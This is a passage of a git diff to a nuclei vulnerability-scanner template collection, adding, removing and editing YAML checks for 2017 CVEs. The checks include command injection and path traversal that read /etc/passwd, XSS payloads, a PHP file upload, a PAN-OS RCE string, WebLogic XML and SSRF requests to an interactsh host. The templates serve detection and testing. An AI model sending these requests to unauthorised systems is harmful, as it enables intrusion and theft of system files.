cvss-score: 6.10 - cve-id: CVE-2017-14524 - cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2017/CVE-2017-14535.yaml b/nuclei-templates/CVE-2017/CVE-2017-14535.yaml new file mode 100644 index 0000000000..b116743885 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-14535.yaml @@ -0,0 +1,42 @@ +id: CVE-2017-14535 + +info: + name: Trixbox - 2.8.0.4 OS Command Injection + author: pikpikcu + severity: high + description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + reference: + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 + - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + tags: cve,cve2017,trixbox,rce,injection + +requests: + - raw: + - | + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14537.yaml b/nuclei-templates/CVE-2017/CVE-2017-14537.yaml deleted file mode 100644 index 66f9cfe5ba..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-14537.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2017-14537 - -info: - name: Trixbox 2.8.0 - Path Traversal - author: pikpikcu - severity: medium - description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. - reference: - - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - - https://sourceforge.net/projects/asteriskathome/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2017-14537 - cwe-id: CWE-22 - tags: cve,cve2017,trixbox,lfi - -requests: - - raw: - - | - POST /maint/index.php?packages HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{Hostname}}/maint/index.php?packages - Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - - xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - - - | - GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Referer: {{Hostname}}/maint/index.php?packages - Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 - Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14651.yaml b/nuclei-templates/CVE-2017/CVE-2017-14651.yaml deleted file mode 100644 index 401d1e3040..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-14651.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2017-14651 - -info: - name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting - author: mass0ma - severity: medium - description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. - reference: - - https://github.com/cybersecurityworks/Disclosed/issues/15 - - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 - - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-14651 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2017-14651 - cwe-id: CWE-79 - tags: cve,cve2017,wso2,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E" - - matchers-condition: and - matchers: - - - type: word - words: - - "" - - "Failed to add new collection" - part: body - condition: and - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2017/CVE-2017-14849.yaml b/nuclei-templates/CVE-2017/CVE-2017-14849.yaml new file mode 100644 index 0000000000..87a14fe679 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-14849.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-14849 + +info: + name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal + author: Random_Robbie + severity: high + description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. + reference: + - https://twitter.com/nodejs/status/913131152868876288 + - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ + - http://www.securityfocus.com/bid/101056 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + tags: cve,cve2017,nodejs,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2017/CVE-2017-15287.yaml b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml new file mode 100644 index 0000000000..144181dec3 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-15287.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-15287 + +info: + name: Dreambox WebControl 2.0.0 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: | + Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. + reference: + - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf + - https://www.exploit-db.com/exploits/42986/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-15287 + cwe-id: CWE-79 + tags: cve,cve2017,xss,dreambox + +requests: + - raw: + - | + GET /webadmin/pkg?command= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: word + words: + - 'Unknown command: ' + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml b/nuclei-templates/CVE-2017/CVE-2017-15647.yaml deleted file mode 100644 index eb06edfa05..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-15647.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2017-15647 - -info: - name: FiberHome - Directory Traversal - author: daffainfo - severity: high - description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - reference: - - https://www.exploit-db.com/exploits/44054 - - https://www.cvedetails.com/cve/CVE-2017-15647 - - https://blogs.securiteam.com/index.php/archives/3472 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-15647 - cwe-id: CWE-22 - tags: cve,cve2017,lfi,router - -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-15944.yaml b/nuclei-templates/CVE-2017/CVE-2017-15944.yaml deleted file mode 100644 index ffbe9d78c8..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-15944.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-15944 - -info: - name: Palo Alto Network PAN-OS - Remote Code Execution - author: emadshanab,milo2012 - severity: critical - description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. - reference: - - https://www.exploit-db.com/exploits/43342 - - https://security.paloaltonetworks.com/CVE-2017-15944 - - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2017-15944 - tags: cve,cve2017,rce,vpn,panos,globalprotect - -requests: - - raw: - - | - GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 - Host: {{Hostname}} - Cookie: PHPSESSID={{randstr}}; - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "@start@Success@end@" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-16806.yaml b/nuclei-templates/CVE-2017/CVE-2017-16806.yaml deleted file mode 100644 index 2a15ee382b..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-16806.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2017-16806 - -info: - name: Ulterius Server < 1.9.5.0 - Directory Traversal - author: geeknik - severity: high - description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs. - reference: - - https://www.exploit-db.com/exploits/43141 - - https://nvd.nist.gov/vuln/detail/CVE-2017-16806 - - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee - - https://www.exploit-db.com/exploits/43141/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-16806 - cwe-id: CWE-22 - tags: cve,cve2017,ulterius,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" - - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2017/CVE-2017-17043.yaml b/nuclei-templates/CVE-2017/CVE-2017-17043.yaml new file mode 100644 index 0000000000..4148e13038 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-17043.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/ + - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt + - https://wpvulndb.com/vulnerabilities/8964 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-17451.yaml b/nuclei-templates/CVE-2017/CVE-2017-17451.yaml new file mode 100644 index 0000000000..69e1e0c84d --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-17451.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + - https://wordpress.org/plugins/wp-mailster/#developers + - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8973 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-18024.yaml b/nuclei-templates/CVE-2017/CVE-2017-18024.yaml deleted file mode 100644 index f10df9314d..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-18024.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2017-18024 - -info: - name: AvantFAX 3.3.3 XSS - author: pikpikcu - severity: medium - description: AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. - reference: - - https://hackerone.com/reports/963798 - - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-18024 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-18024 - cwe-id: CWE-79 - tags: cve,cve2017,xss,avantfax - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1 - - matchers-condition: and - matchers: - - type: word - words: - - '' - - 'AvantFAX' - part: body - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2017/CVE-2017-18536.yaml b/nuclei-templates/CVE-2017/CVE-2017-18536.yaml deleted file mode 100644 index dc426c5827..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-18536.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-18536 - -info: - name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. - reference: - - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - - https://wordpress.org/plugins/stop-user-enumeration/#developers - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-18536 - cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-18638.yaml b/nuclei-templates/CVE-2017/CVE-2017-18638.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-18638.yaml rename to nuclei-templates/CVE-2017/CVE-2017-18638.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-3506.yaml b/nuclei-templates/CVE-2017/CVE-2017-3506.yaml new file mode 100644 index 0000000000..6c17691b77 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-3506.yaml @@ -0,0 +1,50 @@ +id: CVE-2017-3506 + +info: + name: Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution + author: pdteam + severity: high + description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. + reference: + - https://hackerone.com/reports/810778 + - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html + - http://www.securityfocus.com/bid/97884 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.4 + cve-id: CVE-2017-3506 + tags: cve,cve2017,weblogic,oracle,rce,oast + +requests: + - raw: + - | + POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, + Content-Type: text/xml;charset=UTF-8 + + + + + + + http://{{interactsh-url}} + + + + + + + + + + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/04/20 diff --git a/nuclei-templates/CVE-2017/CVE-2017-5521.yaml b/nuclei-templates/CVE-2017/CVE-2017-5521.yaml index 85bcc877f5..b4af9ed3ad 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-5521.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-5521.yaml @@ -1,5 +1,4 @@ id: CVE-2017-5521 - info: name: Bypassing Authentication on NETGEAR Routers author: princechaddha @@ -8,14 +7,12 @@ info: reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - - http://www.securityfocus.com/bid/95457 + tags: cve,cve2017,auth-bypass,netgear classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-score: 8.10 cve-id: CVE-2017-5521 cwe-id: CWE-200 - tags: cve,cve2017,auth-bypass,netgear requests: - method: GET diff --git a/nuclei-templates/CVE-2017/CVE-2017-5631.yaml b/nuclei-templates/CVE-2017/CVE-2017-5631.yaml index 4833758109..8f0b35c820 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-5631.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-5631.yaml @@ -1,23 +1,35 @@ id: CVE-2017-5631 info: - name: CaseAware - Cross Site Scripting + name: KMCIS CaseAware - Cross-Site Scripting author: edoardottt severity: medium - description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 - https://www.openbugbounty.org/incidents/228262/ - https://www.exploit-db.com/exploits/42042/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware + epss-score: 0.00286 + epss-percentile: 0.65504 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems -requests: +http: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -37,3 +49,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/cve-2017-5638.yaml b/nuclei-templates/CVE-2017/CVE-2017-5638.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-5638.yaml rename to nuclei-templates/CVE-2017/CVE-2017-5638.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-5982.yaml b/nuclei-templates/CVE-2017/CVE-2017-5982.yaml deleted file mode 100644 index fe0f9bdd7f..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-5982.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2017-5982 - -info: - name: Kodi 17.1 Local File Inclusion - author: 0x_Akoko - severity: high - description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability. - reference: - - https://cxsecurity.com/issue/WLB-2017020164 - - https://www.cvedetails.com/cve/CVE-2017-5982 - - https://www.exploit-db.com/exploits/41312/ - - http://seclists.org/fulldisclosure/2017/Feb/27 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-5982 - cwe-id: CWE-98 - tags: cve,cve2017,kodi,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-6090.yaml b/nuclei-templates/CVE-2017/CVE-2017-6090.yaml deleted file mode 100644 index 0a448dae64..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-6090.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2017-6090 - -info: - name: PhpColl 2.5.1 Arbitrary File Upload - author: pikpikcu - severity: high - description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. - reference: - - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - - https://www.exploit-db.com/exploits/42934/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2017-6090 - cwe-id: CWE-434 - tags: cve,cve2017,phpcollab,rce,fileupload - -requests: - - raw: - - | # REQUEST 1 - POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 - - -----------------------------154934846911423734231554128137 - Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" - Content-Type: application/x-php - - - - -----------------------------154934846911423734231554128137-- - - - | # REQUEST 2 - GET /logos_clients/1.php HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "48dbd2384cb6b996fa1e2855c7f0567f" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2017/CVE-2017-7391.yaml b/nuclei-templates/CVE-2017/CVE-2017-7391.yaml deleted file mode 100644 index 28c0c4ee93..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-7391.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2017-7391 - -info: - name: Magmi Cross-Site Scripting v.0.7.22 - author: pikpikcu - severity: medium - description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. - reference: - - https://github.com/dweeves/magmi-git/issues/522 - - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip - - https://github.com/dweeves/magmi-git/pull/525 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-7391 - cwe-id: CWE-79 - tags: cve,cve2017,magmi,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"><' - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/CVE-2017/cve-2017-7921.yaml b/nuclei-templates/CVE-2017/CVE-2017-7921.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-7921.yaml rename to nuclei-templates/CVE-2017/CVE-2017-7921.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-9288.yaml b/nuclei-templates/CVE-2017/CVE-2017-9288.yaml index bc6706fc06..843b3c84d2 100644 --- a/nuclei-templates/CVE-2017/CVE-2017-9288.yaml +++ b/nuclei-templates/CVE-2017/CVE-2017-9288.yaml @@ -5,17 +5,13 @@ info: author: daffainfo severity: medium description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 - - https://github.com/MindscapeHQ/raygun4wordpress/pull/17 - - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 - - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + tags: cve,cve2017,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2017-9288 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin requests: - method: GET diff --git a/nuclei-templates/CVE-2017/CVE-2017-9506.yaml b/nuclei-templates/CVE-2017/CVE-2017-9506.yaml new file mode 100644 index 0000000000..393153702a --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-9506.yaml @@ -0,0 +1,30 @@ +id: CVE-2017-9506 + +info: + name: Jira IconURIServlet SSRF + author: pdteam + severity: medium + description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). + reference: + - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html + - https://ecosystem.atlassian.net/browse/OAUTH-344 + - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-9506 + cwe-id: CWE-918 + tags: cve,cve2017,atlassian,jira,ssrf,oast + +requests: + - raw: + - | + GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: 